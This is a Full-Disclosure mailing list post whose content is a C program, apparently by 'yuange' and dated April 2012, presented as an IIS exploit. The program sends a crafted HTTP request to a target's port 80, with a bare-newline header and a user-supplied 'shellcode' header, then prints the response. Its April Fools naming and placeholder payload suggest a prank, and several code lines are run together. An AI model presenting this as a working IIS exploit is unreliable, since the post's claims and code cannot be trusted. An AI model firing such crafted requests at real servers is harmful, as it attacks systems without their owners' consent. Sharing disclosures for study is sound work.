Re: iis bug

[yuange <yuange1975 () hotmail com>]

     ver4.1.1     /*  iisexp41.c  ver4.1 copy by @yuange1975 2012.4.1
  iisexp411.c  ver4.1.1 copy by @yuange1975 2012.4.2
   
  1.Changing the input parameters  2.To increase the receive data
     
  假作真时真亦假。True Mingled also false.
  http://weibo.com/yuange1975
  http://twitter.com/yuange75
  http://hi.baidu.com/yuange1975/blog/item/ac368655017819dbb745aeee.html
*/
#include <stdio.h>
#include <stdlib.h>#include <winsock2.h>
#include <windows.h>
#include <mswsock.h>
#include <wsnwlink.h>
#include <ws2tcpip.h>
#include <process.h>    /* _beginthread, _endthread */
#include <errno.h>
#include <io.h>
#include <conio.h>#pragma comment(lib,"ws2_32")
#pragma comment(lib,"Mswsock")/*
char  *AprilFoolsDay ="GET /AprilFools'Day.php  HTTP/1.1\r\nHOST:weibo.com/yuange1975\r\na=b\nc:shellcode\r\n\r\n"; 
*/
char  *AprilFoolsDay ="GET %s HTTP/1.1\r\nHOST:%s\r\na=b\n%s:%s\r\n\r\n"; static unsigned int maybe_lookup_host(char* 
name) 
{
  unsigned long ulAddr = INADDR_NONE;  /* Don't bother resolving raw IP addresses, naturally. */
  ulAddr = inet_addr((char*)name); 
  if ( ulAddr != INADDR_NONE && ulAddr != INADDR_ANY )
   return (unsigned int)ulAddr;  return 0;
}int do_exp(char *hostname,unsigned int port,char *AprilFools, char *c,char *shellcode)
{
    SOCKET hScoket = INVALID_SOCKET;
 struct sockaddr_in sin;
 unsigned int addr=0;
 int write_res = 0;
 int read_res = 0;
 char crash_buf[0x4000];
 int crash_buflen=0;
 /*
     create SOCKET
  */
 hScoket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0/*WSA_FLAG_OVERLAPPED*/); 
 if (hScoket == INVALID_SOCKET) { 
  printf_s("WSASocket function failed with error = %d\n", WSAGetLastError() );
  return -1;
 }   /* Resolved IP address          */
 addr = maybe_lookup_host(hostname); sin.sin_family = AF_INET;
 sin.sin_port   = htons(port);
 memcpy(&sin.sin_addr,&addr,4); /*
     connect
  */
 if ( connect(hScoket, (struct sockaddr*) &sin, sizeof(struct sockaddr_in) ) == SOCKET_ERROR) {
  if ( WSAEWOULDBLOCK != WSAGetLastError() ) {
   closesocket(hScoket);
   printf_s("connect function failed with error: %ld\n", WSAGetLastError());
   return -1;
  }
 } 
 
 printf("[*] connected to %s:%d\n",hostname,port);
 
 //build_crash_package(&crash_buf,&crash_buflen); 
sprintf_s(crash_buf,0x400,AprilFoolsDay,AprilFools,hostname,c,shellcode);
 crash_buflen = strlen(crash_buf); //printf("%s",crash_buf);
  /*
      send data to remote target
   */
  write_res = send( hScoket,
                 crash_buf,
                       crash_buflen,
                       0);  
  
  printf("[*] send %d bytes\n\n",write_res);
    while(1){ 
  read_res     =    recv( hScoket,
                 crash_buf,
                       0x4000-1,
                       0);
  if(read_res<=0) break;
  crash_buf[read_res]=0;
  printf("%s",crash_buf);
    } closesocket(hScoket);
 return 0;
}int main(int argc, const char **argv)
{
    int iResult;
    char * target_ip = (char*)argv[1];
 char *AprilFools="/AprilFools'Day.php";
 char *c="c";
 char *shellcode="shellcode";
 WSADATA wsaData; if ( !target_ip || argc < 2 ) {
  printf_s("usage: <target_ip> /AprilFools'Day.php c shellcode \n");
  return 0;
 }
 if(argc>2)  AprilFools=(char*)argv[2]; 
 if(argc>3)  c= (char*)argv[3];
 if(argc>4)  shellcode=(char*)argv[4];
 
 
 /* Initialize Winsock */
 iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
 if (iResult != 0) {
  printf_s("WSAStartup failed: %d\n", iResult);
  return -1;
 } do_exp(target_ip,80,AprilFools,c,shellcode);
 
 /* clean - win socket */
 WSACleanup(); return 0;
}

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/